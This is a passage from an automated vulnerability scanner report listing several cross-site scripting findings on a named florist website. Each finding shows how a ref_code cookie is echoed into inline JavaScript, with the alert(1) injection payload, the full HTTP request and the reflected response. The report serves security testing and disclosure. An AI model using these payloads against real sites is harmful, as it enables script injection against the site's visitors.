Path:   /comeback.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript rest-of-line comment. The payload 887eb%0aalert(1)//a43d5f34193 was submitted in the ref_code cookie. This input was echoed as 887eb
alert(1)//a43d5f34193
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /comeback.htm HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950887eb%0aalert(1)//a43d5f34193;

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=422fee3e25aa7a57b98ec7e306cf877f; path=/
Connection: close
Content-Type: text/html
Content-Length: 103526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
Var14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="C";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950887eb
alert(1)//a43d5f34193
";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.127. http://www.floristexpress.net/comeback.htm [ref_code cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /comeback.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16594"%3balert(1)//c41372478c8 was submitted in the ref_code cookie. This input was echoed as 16594";alert(1)//c41372478c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /comeback.htm HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=16594"%3balert(1)//c41372478c8;

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=adac7f85c4277d271fcc88a8141c69da; path=/
Connection: close
Content-Type: text/html
Content-Length: 103496

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
";
s.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="A";
s.eVar36="16594";alert(1)//c41372478c8";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.128. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /products/tulip_rainbow.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8173"%3balert(1)//95ac6cbaf33c38076 was submitted in the ref_code cookie. This input was echoed as e8173";alert(1)//95ac6cbaf33c38076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/tulip_rainbow.htm?order_prod_num=FYF-MIXTUL&order_prod_size=r&order_upgrds%5Bm%5D%5Bqty%5D=&order_upgrds%5Bm%5D%5Bopt%5D=&order_upgrds%5Bl%5D%5Bqty%5D=&order_upgrds%5Bl%5D%5Bopt%5D=&order_upgrds%5Bc%5D%5Bopt%5D=&order_upgrds%5Bt%5D%5Bopt%5D=&order_d_card_type=Blank+Card&order_d_recip=&remLen=175&order_d_card_msg=&remChars=175&order_d_card_sig=&order_d_zip=&continue.x=66&continue.y=20 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/products/tulip_rainbow.htm
Cache-Control: max-age=0
Origin: http://www.floristexpress.net
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORDe8173"%3balert(1)//95ac6cbaf33c38076; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Aproduct%25253AFYF-MIXTUL%2526pidt%253D1%2526oid%253Dhttp%25253A//a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/btn_buynow.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:55:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c2d443072044e030c1ee1ec63640d40a; path=/
Content-Type: text/html
Content-Length: 32960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Tulip Rainbow at FloristExpress.Net<
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="D";
s.eVar36="ORDe8173";alert(1)//95ac6cbaf33c38076";
s.eVar40="";
s.eVar47="";

s.products=";FYF-MIXTUL;;;event5=1;";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.129. http://www.floristexpress.net/search.htm [ref_code cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /search.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript rest-of-line comment. The payload 9cce6%0aalert(1)//a6ee837bd09 was submitted in the ref_code cookie. This input was echoed as 9cce6
alert(1)//a6ee837bd09
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search.htm HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE69509cce6%0aalert(1)//a6ee837bd09;

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fae449980e73edd6ddf586df6ebc10c1; path=/
Connection: close
Content-Type: text/html
Content-Length: 103526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
Var14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="A";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE69509cce6
alert(1)//a6ee837bd09
";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.130. http://www.floristexpress.net/search.htm [ref_code cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /search.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8c9c"%3balert(1)//fc46026c459 was submitted in the ref_code cookie. This input was echoed as f8c9c";alert(1)//fc46026c459 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search.htm HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=f8c9c"%3balert(1)//fc46026c459;

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=014025ff7bd7b3bdb7c6e1f747abe972; path=/
Connection: close
Content-Type: text/html
Content-Length: 103496

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
";
s.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="D";
s.eVar36="f8c9c";alert(1)//fc46026c459";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 08:50:20 CST 2011.